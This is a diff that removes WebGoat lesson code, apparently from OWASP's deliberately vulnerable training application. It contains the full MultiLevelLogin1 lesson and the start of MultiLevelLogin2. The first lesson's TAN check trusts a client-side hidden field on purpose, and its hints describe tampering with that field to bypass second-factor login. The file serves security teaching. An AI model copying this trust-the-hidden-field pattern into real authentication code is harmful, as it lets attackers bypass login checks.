-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Reto Lippuner, Marcel Wirth
- * @created April 7, 2008
- */
-
-public class MultiLevelLogin1 extends SequentialLessonAdapter
-{
-    private final static String USER = "user";
-    private final static String PASSWORD = "pass";
-    private final static String HIDDEN_TAN = "hidden_tan";
-    private final static String TAN = "tan";
-
-    private final static String LOGGEDIN = "loggedin";
-    private final static String CORRECTTAN = "correctTan";
-    private final static String LOGGEDINUSER = "loggedInUser";
-
-    /**
-     * Creates Staged WebContent
-     * 
-     * @param s
-     */
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    /**
-     * See if the user has logged in correctly
-     * 
-     * @param s
-     * @return true if loggedIn
-     */
-    private boolean loggedIn(WebSession s)
-    {
-        try
-        {
-            return s.get(LOGGEDIN).equals("true");
-        } catch (Exception e)
-        {
-            return false;
-        }
-    }
-
-    /**
-     * See if the user had used a valid tan
-     * 
-     * @param s
-     * @return true if correctTan
-     */
-    private boolean correctTan(WebSession s)
-    {
-        try
-        {
-            return s.get(CORRECTTAN).equals("true");
-        } catch (Exception e)
-        {
-            return false;
-        }
-    }
-
-    /**
-     * Get the logged in user
-     * 
-     * @param s
-     * @return the logged in user
-     */
-    private String getLoggedInUser(WebSession s)
-    {
-        try
-        {
-            String user = (String) s.get(LOGGEDINUSER);
-            return user;
-        } catch (Exception e)
-        {
-            return "";
-        }
-    }
-
-    /**
-     * Creation of the main content
-     * 
-     * @param s
-     * @return Element
-     */
-    protected Element createMainContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            style sty = new style();
-
-            sty
-                    .addElement("#lesson_wrapper {height: 435px;width: "
-                            + "500px;}#lesson_header {background-image: "
-                            + "url(lessons/DBSQLInjection/images/lesson1_header.jpg);width:"
-                            + " 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace "
-                            + "{background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: "
-                            + "325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}        "
-                            + ".lesson_text {height: 240px;width: 460px;padding-top: 5px;}          "
-                            + "#lesson_buttons_bottom {height: 20px;width: 460px;}          "
-                            + "#lesson_b_b_left {width: 300px;float: left;}         "
-                            + "#lesson_b_b_right input {width: 100px;float: right;}         "
-                            + ".lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}            "
-                            + ".lesson_workspace { }            "
-                            + ".lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}          "
-                            + ".lesson_text_db {color: #0066FF}         "
-                            + "#lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: "
-                            + "124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top:"
-                            + " 50px;text-align: center;}           #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: "
-                            + "12px;text-align: center;}            #lesson_search {background-image: "
-                            + "url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: "
-                            + "no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
-            ec.addElement(sty);
-
-            Div wrapperDiv = new Div();
-            wrapperDiv.setID("lesson_wrapper");
-
-            Div headerDiv = new Div();
-            headerDiv.setID("lesson_header");
-
-            Div workspaceDiv = new Div();
-            workspaceDiv.setClass("lesson_workspace");
-
-            wrapperDiv.addElement(headerDiv);
-            wrapperDiv.addElement(workspaceDiv);
-
-            ec.addElement(wrapperDiv);
-
-            workspaceDiv.addElement(createWorkspaceContent(s));
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Creation of the content of the workspace
-     * 
-     * @param s
-     * @return Element
-     */
-    private Element createWorkspaceContent(WebSession s)
-    {
-        String user = "";
-        user = s.getParser().getStringParameter(USER, "");
-        String password = "";
-        password = s.getParser().getStringParameter(PASSWORD, "");
-        String tan = "";
-        tan = s.getParser().getStringParameter(TAN, "");
-        String hiddenTan = s.getParser().getStringParameter(HIDDEN_TAN, "");
-
-        ElementContainer ec = new ElementContainer();
-
-        // verify that tan is correct and user is logged in
-        if (loggedIn(s) && correctTan(getLoggedInUser(s), tan, hiddenTan, s))
-        {
-            s.add(CORRECTTAN, "true");
-        }
-        // user is loggedIn but enters wrong tan
-        else if (loggedIn(s) && !correctTan(getLoggedInUser(s), tan, hiddenTan, s))
-        {
-            s.add(LOGGEDIN, "false");
-        }
-
-        // verify the password
-        if (correctLogin(user, password, s))
-        {
-            s.add(LOGGEDIN, "true");
-            s.add(LOGGEDINUSER, user);
-        }
-
-        // if restart link is clicked owe have to reset log in
-        if (!s.getParser().getStringParameter("Restart", "").equals(""))
-        {
-            s.add(LOGGEDIN, "false");
-            s.add(CORRECTTAN, "false");
-            resetTans(s);
-        }
-        // Logout Button is pressed
-        if (s.getParser().getRawParameter("logout", "").equals("true"))
-        {
-            s.add(LOGGEDIN, "false");
-            s.add(CORRECTTAN, "false");
-
-        }
-        if (loggedIn(s) && correctTan(s))
-        {
-            s.add(LOGGEDIN, "false");
-            s.add(CORRECTTAN, "false");
-
-            createSuccessfulLoginContent(s, ec);
-            if (getLessonTracker(s).getStage() == 2)
-            {
-                if (hiddenTan.equals("1"))
-                {
-                    makeSuccess(s);
-                }
-            }
-            else
-            {
-                getLessonTracker(s).setStage(2);
-                s.setMessage("Stage 1 completed.");
-            }
-        }
-
-        else if (loggedIn(s))
-        {
-            int tanNr = getTanPosition(getLoggedInUser(s), s);
-            if (tanNr == 0)
-            {
-                createNoTanLeftContent(ec);
-
-            }
-            else
-            {
-                createAskForTanContent(s, ec, tanNr);
-            }
-
-        }
-        else
-        {
-            String errorMessage = "";
-
-            if (!(user + password).equals(""))
-            {
-                errorMessage = "Login failed! Make sure " + "that user name and password is correct.";
-            }
-            else if (!tan.equals(""))
-            {
-                errorMessage = "Login failed. Tan is " + "incorrect.";
-            }
-
-            createLogInContent(ec, errorMessage);
-        }
-
-        return ec;
-    }
-
-    /**
-     * Create content for logging in
-     * 
-     * @param ec
-     */
-    private void createLogInContent(ElementContainer ec, String errorMessage)
-    {
-        Div loginDiv = new Div();
-        loginDiv.setID("lesson_login");
-
-        Table table = new Table();
-        table.addAttribute("align='center'", 0);
-        TR tr1 = new TR();
-        TD td1 = new TD();
-        TD td2 = new TD();
-        td1.addElement(new StringElement("Enter your name: "));
-        td2.addElement(new Input(Input.TEXT, USER));
-        tr1.addElement(td1);
-        tr1.addElement(td2);
-
-        TR tr2 = new TR();
-        TD td3 = new TD();
-        TD td4 = new TD();
-        td3.addElement(new StringElement("Enter your password: "));
-        td4.addElement(new Input(Input.PASSWORD, PASSWORD));
-        tr2.addElement(td3);
-        tr2.addElement(td4);
-
-        TR tr3 = new TR();
-        TD td5 = new TD();
-        td5.setColSpan(2);
-        td5.setAlign("center");
-
-        td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        tr3.addElement(td5);
-
-        table.addElement(tr1);
-        table.addElement(tr2);
-        table.addElement(tr3);
-        loginDiv.addElement(table);
-        ec.addElement(loginDiv);
-
-        H2 errorTag = new H2(errorMessage);
-        errorTag.addAttribute("align", "center");
-        errorTag.addAttribute("class", "info");
-        ec.addElement(errorTag);
-    }
-
-    /**
-     * Create content in which the tan is asked
-     * 
-     * @param s
-     * @param ec
-     * @param tanNr
-     */
-    private void createAskForTanContent(WebSession s, ElementContainer ec, int tanNr)
-    {
-
-        Div loginDiv = new Div();
-        loginDiv.setID("lesson_login");
-
-        Table table = new Table();
-        table.addAttribute("align='center'", 0);
-        TR tr1 = new TR();
-        TD td1 = new TD();
-        TD td2 = new TD();
-        td1.addElement(new StringElement("Enter TAN  #" + tanNr + ": "));
-        td2.addElement(new Input(Input.TEXT, TAN));
-        tr1.addElement(td1);
-        tr1.addElement(td2);
-
-        TR tr2 = new TR();
-        TD td3 = new TD();
-        td3.setColSpan(2);
-        td3.setAlign("center");
-
-        td3.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        tr2.addElement(td3);
-
-        table.addElement(tr1);
-        table.addElement(tr2);
-
-        ec.addElement(new Input(Input.HIDDEN, HIDDEN_TAN, tanNr));
-        loginDiv.addElement(table);
-        ec.addElement(loginDiv);
-        ec.addElement(createLogoutLink());
-
-    }
-
-    /**
-     * Create content if there is no tan left
-     * 
-     * @param ec
-     */
-    private void createNoTanLeftContent(ElementContainer ec)
-    {
-
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        H1 h = new H1("<center>No tan is left! Please contact the admin. </center>");
-        ec.addElement(h);
-        ec.addElement(createLogoutLink());
-    }
-
-    /**
-     * Create content after a successful login
-     * 
-     * @param s
-     * @param ec
-     */
-    private void createSuccessfulLoginContent(WebSession s, ElementContainer ec)
-    {
-
-        updateTan(getLoggedInUser(s), s);
-        String userDataStyle = "margin-top:50px;";
-
-        Div userDataDiv = new Div();
-        userDataDiv.setStyle(userDataStyle);
-        userDataDiv.addAttribute("align", "center");
-        Table table = new Table();
-        table.addAttribute("cellspacing", 10);
-        table.addAttribute("cellpadding", 5);
-
-        table.addAttribute("align", "center");
-        TR tr1 = new TR();
-        TR tr2 = new TR();
-        TR tr3 = new TR();
-        TR tr4 = new TR();
-        tr1.addElement(new TD("<b>Firstname:</b>"));
-        tr1.addElement(new TD(getLoggedInUser(s)));
-
-        try
-        {
-            ResultSet results = getUser(getLoggedInUser(s), s);
-            results.first();
-
-            tr2.addElement(new TD("<b>Lastname:</b>"));
-            tr2.addElement(new TD(results.getString("last_name")));
-
-            tr3.addElement(new TD("<b>Credit Card Type:</b>"));
-            tr3.addElement(new TD(results.getString("cc_type")));
-
-            tr4.addElement(new TD("<b>Credit Card Number:</b>"));
-            tr4.addElement(new TD(results.getString("cc_number")));
-
-        }
-
-        catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-        table.addElement(tr1);
-        table.addElement(tr2);
-        table.addElement(tr3);
-        table.addElement(tr4);
-
-        userDataDiv.addElement(table);
-        ec.addElement(userDataDiv);
-        ec.addElement(createLogoutLink());
-    }
-
-    /**
-     * Create a link for logging out
-     * 
-     * @return Element
-     */
-    private Element createLogoutLink()
-    {
-        A logoutLink = new A();
-        logoutLink.addAttribute("href", getLink() + "&logout=true");
-        logoutLink.addElement("Logout");
-
-        String logoutStyle = "margin-right:50px; mrgin-top:30px";
-        Div logoutDiv = new Div();
-        logoutDiv.addAttribute("align", "right");
-        logoutDiv.addElement(logoutLink);
-        logoutDiv.setStyle(logoutStyle);
-
-        return logoutDiv;
-    }
-
-    /**
-     * Update the tan. Every tan should be used only once.
-     * 
-     * @param user
-     * @param s
-     */
-    private void updateTan(String user, WebSession s)
-    {
-        int tanNr = getTanPosition(user, s);
-
-        Connection connection = null;
-
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "UPDATE user_data_tan SET login_count = ? WHERE first_name = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setInt(1, tanNr);
-            prepStatement.setString(2, user);
-            prepStatement.execute();
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-    }
-
-    /**
-     * If lesson is reseted the tans should be resetted too
-     * 
-     * @param s
-     */
-    private void resetTans(WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "UPDATE user_data_tan SET login_count = 0 WHERE login_count > 0";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.execute();
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-    }
-
-    /**
-     * Get the count of the tan
-     * 
-     * @param user
-     * @param s
-     * @return tanPosition
-     */
-    private int getTanPosition(String user, WebSession s)
-    {
-        int tanNr = 0;
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT login_count FROM user_data_tan WHERE first_name = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true))
-            {
-
-                tanNr = results.getInt(results.getRow());
-                tanNr = tanNr + 1;
-                if (tanNr > 5)
-                {
-                    tanNr = 0;
-                }
-                // make sure you don't get the first tan in stage 2
-                if (getLessonTracker(s).getStage() == 2 && tanNr == 1)
-                {
-                    ++tanNr;
-                }
-            }
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-        return tanNr;
-    }
-
-    /**
-     * Get a user by its name
-     * 
-     * @param user
-     * @param s
-     * @return ResultSet containing the user
-     */
-    private ResultSet getUser(String user, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT * FROM user_data_tan WHERE first_name = ? ";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            return results;
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-        return null;
-
-    }
-
-    /**
-     * See if the tan is correct
-     * 
-     * @param user
-     * @param tan
-     * @param tanPosition
-     * @param s
-     * @return true if the tan is correct
-     */
-    private boolean correctTan(String user, String tan, String tanPosition, WebSession s)
-    {
-        if (tan.equals("")) { return false; }
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT user_data_tan.userid FROM user_data_tan, tan WHERE user_data_tan.first_name = ? "
-                    + "AND user_data_tan.userid = tan.userid AND tan.tanValue = ? AND tan.tanNr = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-            prepStatement.setString(2, tan);
-            prepStatement.setString(3, tanPosition);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true)) {
-
-            return true;
-
-            }
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-        return false;
-    }
-
-    /**
-     * See if the password and corresponding user is valid
-     * 
-     * @param userName
-     * @param password
-     * @param s
-     * @return true if the password was correct
-     */
-    private boolean correctLogin(String userName, String password, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT * FROM user_data_tan WHERE first_name = ? AND password = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, userName);
-            prepStatement.setString(2, password);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true)) {
-
-            return true;
-
-            }
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-        return false;
-
-    }
-
-    /**
-     * Gets the category attribute of the RoleBasedAccessControl object
-     * 
-     * @return The category value
-     */
-    protected ElementContainer doStage1(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(createMainContent(s));
-        return ec;
-
-    }
-
-    /**
-     * After finishing succesful stage1 this function is called
-     */
-    protected Element doStage2(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(createMainContent(s));
-        return ec;
-    }
-
-    /**
-     * Get the category
-     * 
-     * @return the category
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.AUTHENTICATION;
-    }
-
-    /**
-     * Gets the hints attribute of the RoleBasedAccessControl object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints.add("Stage 1: Just do a regular login");
-        hints.add("Stage 2: How does the server know which TAN has to be used?");
-        hints.add("Stage 2: Maybe taking a look at the source code helps");
-        hints.add("Stage 2: Watch out for hidden fields");
-        hints.add("Stage 2: Manipulate the hidden field 'hidden_tan'");
-
-        return hints;
-
-    }
-
-    /**
-     * Get the instructions for the user
-     */
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-        if (getLessonTracker(s).getStage() == 1)
-        {
-            instructions = "STAGE 1:\t This stage is just to show how a classic multi login works. "
-                    + "Your goal is to do a regular login as <b>Jane</b> with password <b>tarzan</b>. "
-                    + "You have following TANs: <br>" + "Tan #1 = 15648<br>" + "Tan #2 = 92156<br>"
-                    + "Tan #3 = 4879<br>" + "Tan #4 = 9458<br>" + "Tan #5 = 4879<br>";
-
-        }
-        else if (getLessonTracker(s).getStage() == 2)
-        {
-            instructions = "STAGE 2:\tNow you are a hacker who " + "already has stolen some information from Jane by "
-                    + "a phishing mail. " + "You have the password which is tarzan and "
-                    + "the Tan #1 which is 15648 <br>" + "The problem is that the first tan is already "
-                    + "used... try to break into the system anyway. ";
-        }
-
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(110);
-
-    /**
-     * Get the ranking for the hirarchy of lessons
-     */
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Get the title of the Lesson
-     */
-    public String getTitle()
-    {
-        return ("Multi Level Login 1");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
-    }
-}

src/main/java/org/owasp/webgoat/lessons/MultiLevelLogin2.java

@@ -1,815 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.H2;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Reto Lippuner, Marcel Wirth
- * @created April 7, 2008
- */
-
-public class MultiLevelLogin2 extends LessonAdapter
-{
-    private final static String USER = "user2";
-    private final static String PASSWORD = "pass2";
-    private final static String TAN = "tan2";
-    private final static String HIDDEN_USER = "hidden_user";
-
-    private final static String LOGGEDIN = "loggedin2";
-    private final static String CORRECTTAN = "correctTan2";
-    private final static String CURRENTTAN = "currentTan2";
-    private final static String CURRENTTANPOS = "currentTanPos2";
-
-    // needed to see if lesson was successfull
-    private final static String LOGGEDINUSER = "loggedInUser2";
-
-    // private String LoggedInUser = "";
-
-    /**
-     * See if the user is logged in
-     * 
-     * @param s
-     * @return true if loggedIn
-     */
-    private boolean loggedIn(WebSession s)
-    {
-        try
-        {
-            return s.get(LOGGEDIN).equals("true");
-        } catch (Exception e)
-        {
-            return false;
-        }
-    }
-
-    /**
-     * See if the user had used a valid tan
-     * 
-     * @param s
-     * @return true if correctTan
-     */
-    private boolean correctTan(WebSession s)
-    {
-        try
-        {
-            return s.get(CORRECTTAN).equals("true");
-        } catch (Exception e)
-        {
-            return false;
-        }
-    }
-
-    /**
-     * Get the currentTan
-     * 
-     * @param s
-     * @return the logged in user
-     */
-    private String getCurrentTan(WebSession s)
-    {
-        try
-        {
-            String currentTan = (String) s.get(CURRENTTAN);
-            return currentTan;
-        } catch (Exception e)
-        {
-            return "";
-        }
-    }
-
-    /**
-     * Get the currentTanPossition
-     * 
-     * @param s
-     * @return the logged in user
-     */
-    private Integer getCurrentTanPosition(WebSession s)
-    {
-        try
-        {
-            Integer tanPos = (Integer) s.get(CURRENTTANPOS);
-            return tanPos;
-        } catch (Exception e)
-        {
-            return 0;
-        }
-    }
-
-    /**
-     * Get the logged in user
-     * 
-     * @param s
-     * @return the logged in user
-     */
-    private String getLoggedInUser(WebSession s)
-    {
-        try
-        {
-            String user = (String) s.get(LOGGEDINUSER);
-            return user;
-        } catch (Exception e)
-        {
-            return "";
-        }
-    }
-
-    /**
-     * Creates WebContent
-     * 
-     * @param s
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            style sty = new style();
-
-            sty
-                    .addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}     .lesson_text {height: 240px;width: 460px;padding-top: 5px;}         #lesson_buttons_bottom {height: 20px;width: 460px;}         #lesson_b_b_left {width: 300px;float: left;}            #lesson_b_b_right input {width: 100px;float: right;}            .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}           .lesson_workspace { }           .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}         .lesson_text_db {color: #0066FF}            #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}           #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}           #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
-            ec.addElement(sty);
-
-            Div wrapperDiv = new Div();
-            wrapperDiv.setID("lesson_wrapper");
-
-            Div headerDiv = new Div();
-            headerDiv.setID("lesson_header");
-
-            Div workspaceDiv = new Div();
-            workspaceDiv.setClass("lesson_workspace");
-
-            wrapperDiv.addElement(headerDiv);
-            wrapperDiv.addElement(workspaceDiv);
-
-            ec.addElement(wrapperDiv);
-
-            workspaceDiv.addElement(createWorkspaceContent(s));
-
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Creation of the content of the workspace
-     * 
-     * @param s
-     * @return Element
-     */
-    private Element createWorkspaceContent(WebSession s)
-    {
-        String user = "";
-        user = s.getParser().getStringParameter(USER, "");
-        String password = "";
-        password = s.getParser().getStringParameter(PASSWORD, "");
-        String tan = "";
-        tan = s.getParser().getStringParameter(TAN, "");
-        String hiddenUser = "";
-        hiddenUser = s.getParser().getStringParameter(HIDDEN_USER, "");
-        // String hiddenTan = s.getParser().getStringParameter(HIDDEN_TAN, "");
-
-        ElementContainer ec = new ElementContainer();
-
-        // verify that tan is correct and user is logged in
-        if (loggedIn(s) && correctTan(tan, s))
-        {
-            s.add(CORRECTTAN, "true");
-        }
-        // user is loggedIn but enters wrong tan
-        else if (loggedIn(s) && !correctTan(tan, s))
-        {
-            s.add(LOGGEDIN, "false");
-        }
-
-        if (correctLogin(user, password, s))
-        {
-            s.add(LOGGEDIN, "true");
-            s.add(LOGGEDINUSER, user);
-            s.add(CURRENTTANPOS, getTanPosition(user, s));
-            // currentTanNr = getTanPosition(user, s);
-            // currentTan = getTan(user, currentTanNr, s);
-            s.add(CURRENTTAN, getTan(user, getCurrentTanPosition(s), s));
-
-        }
-
-        // if restart button is clicked owe have to reset log in
-        if (!s.getParser().getStringParameter("Restart", "").equals(""))
-        {
-            resetTans(s);
-        }
-        // Logout Button is pressed
-        if (s.getParser().getRawParameter("logout", "").equals("true"))
-        {
-
-            s.add(LOGGEDIN, "false");
-            s.add(CORRECTTAN, "false");
-
-        }
-        if (loggedIn(s) && correctTan(s))
-        {
-            s.add(LOGGEDIN, "false");
-            s.add(CORRECTTAN, "false");
-
-            createSuccessfulLoginContent(s, ec, hiddenUser);
-
-        }
-        else if (loggedIn(s))
-        {
-            if (getCurrentTanPosition(s) > 5)
-            {
-                createNoTanLeftContent(ec);
-            }
-            else
-            {
-                createAskForTanContent(s, ec, getCurrentTanPosition(s), user);
-            }
-        }
-        else
-        {
-            String errorMessage = "";
-
-            if (!(user + password).equals(""))
-            {
-                errorMessage = "Login failed! Make sure " + "that user name and password is correct.";
-            }
-            else if (!tan.equals(""))
-            {
-                errorMessage = "Login failed. Tan is " + "incorrect.";
-            }
-
-            createLogInContent(ec, errorMessage);
-        }
-
-        return ec;
-    }
-
-    /**
-     * Create content for logging in
-     * 
-     * @param ec
-     */
-    private void createLogInContent(ElementContainer ec, String errorMessage)
-    {
-        Div loginDiv = new Div();
-        loginDiv.setID("lesson_login");
-
-        Table table = new Table();
-        // table.setStyle(tableStyle);
-        table.addAttribute("align='center'", 0);
-        TR tr1 = new TR();
-        TD td1 = new TD();
-        TD td2 = new TD();
-        td1.addElement(new StringElement("Enter your name: "));
-        td2.addElement(new Input(Input.TEXT, USER));
-        tr1.addElement(td1);
-        tr1.addElement(td2);
-
-        TR tr2 = new TR();
-        TD td3 = new TD();
-        TD td4 = new TD();
-        td3.addElement(new StringElement("Enter your password: "));
-        td4.addElement(new Input(Input.PASSWORD, PASSWORD));
-        tr2.addElement(td3);
-        tr2.addElement(td4);
-
-        TR tr3 = new TR();
-        TD td5 = new TD();
-        td5.setColSpan(2);
-        td5.setAlign("center");
-
-        td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        tr3.addElement(td5);
-
-        table.addElement(tr1);
-        table.addElement(tr2);
-        table.addElement(tr3);
-        loginDiv.addElement(table);
-        ec.addElement(loginDiv);
-
-        H2 errorTag = new H2(errorMessage);
-        errorTag.addAttribute("align", "center");
-        errorTag.addAttribute("class", "info");
-        ec.addElement(errorTag);
-    }
-
-    /**
-     * Create content in which the tan is asked
-     * 
-     * @param s
-     * @param ec
-     * @param tanNr
-     */
-    private void createAskForTanContent(WebSession s, ElementContainer ec, int tanNr, String user)
-    {
-
-        Div loginDiv = new Div();
-        loginDiv.setID("lesson_login");
-
-        Table table = new Table();
-        table.addAttribute("align='center'", 0);
-        TR tr1 = new TR();
-        TD td1 = new TD();
-        TD td2 = new TD();
-        td1.addElement(new StringElement("Enter TAN  #" + tanNr + ": "));
-        td2.addElement(new Input(Input.TEXT, TAN));
-        tr1.addElement(td1);
-        tr1.addElement(td2);
-
-        TR tr2 = new TR();
-        TD td3 = new TD();
-        td3.setColSpan(2);
-        td3.setAlign("center");
-
